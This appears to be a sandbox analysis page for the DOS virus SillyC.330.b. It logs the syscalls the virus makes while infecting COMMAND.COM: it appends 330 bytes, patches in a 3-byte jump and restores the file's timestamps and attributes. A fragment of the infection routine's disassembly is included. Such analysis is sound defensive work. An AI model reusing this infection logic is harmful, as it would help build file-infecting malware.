Sample viewer

vx.netlux.org/Virus.DOS.SillyC.330.b

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:03:19.377897817Z 47 PC: 15172 | Get disk transfer address
2018-12-17T23:03:19.379979487Z 26 PC: 15182 | Set disk transfer address
2018-12-17T23:03:19.381025374Z 25 PC: 15190 | Get default drive
2018-12-17T23:03:19.382002017Z 14 PC: 15199 | Set default drive (Drive = 'C')
2018-12-17T23:03:19.383726787Z 78 PC: 151a6 | Find first file
2018-12-17T23:03:19.388942113Z 67 PC: 151d1 | Get or set file attributes
2018-12-17T23:03:19.394308299Z 67 PC: 151dd | Get or set file attributes
2018-12-17T23:03:19.74735875Z 61 PC: 151e5 | Open file (Filename = 'COMMAND.COM')
2018-12-17T23:03:19.753624975Z 87 PC: 151ec | Get or set file date and time
2018-12-17T23:03:19.754869353Z 44 PC: 151f8 | Get time 0x151f8: or dx, dx
0x151fa: je 0x151f4
0x151fc: mov word ptr [bp + 0x145], dx
0x15200: mov ah, 0x3f
0x15202: lea dx, word ptr [bp + 0x13a]
0x15206: mov cx, 3
0x15209: int 0x21
0x1520b: mov ax, 0x4202
0x1520e: xor cx, cx
0x15210: xor dx, dx
0x15212: int 0x21
0x15214: sub ax, 3
0x15217: mov word ptr [0xfb2d], ax
0x1521a: mov byte ptr [0xfb2c], 0xe9
0x1521f: lea si, word ptr [bp - 3]
0x15222: mov di, 0xfcbc
0x15225: mov cx, 0x14a
0x15228: rep movsb byte ptr es:[di], byte ptr [si]
0x1522a: mov si, 0xfcd4
0x1522d: call 0x25158
2018-12-17T23:03:19.756965635Z 63 PC: 1520b | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:03:19.759539049Z 66 PC: 15214 | Move file pointer
2018-12-17T23:03:19.760863572Z 64 PC: 1523a | Write file or device (Write 330 bytes on handle 5)
2018-12-17T23:03:19.767183765Z 66 PC: 15243 | Move file pointer
2018-12-17T23:03:19.76852242Z 64 PC: 1524d | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:03:19.77099032Z 87 PC: 15260 | Get or set file date and time
2018-12-17T23:03:19.772284101Z 62 PC: 15264 | Close file
2018-12-17T23:03:19.779593421Z 67 PC: 15270 | Get or set file attributes
2018-12-17T23:03:19.78898824Z 26 PC: 1527d | Set disk transfer address
2018-12-17T23:03:19.790233539Z 14 PC: 15286 | Set default drive (Drive = 'A')
2018-12-17T23:03:19.794246451Z 9 PC: 12bb5 | Display string (Could not find end pointer)
2018-12-17T23:03:19.804844143Z 76 PC: 12bcb | Terminate with return code (Return code = '0')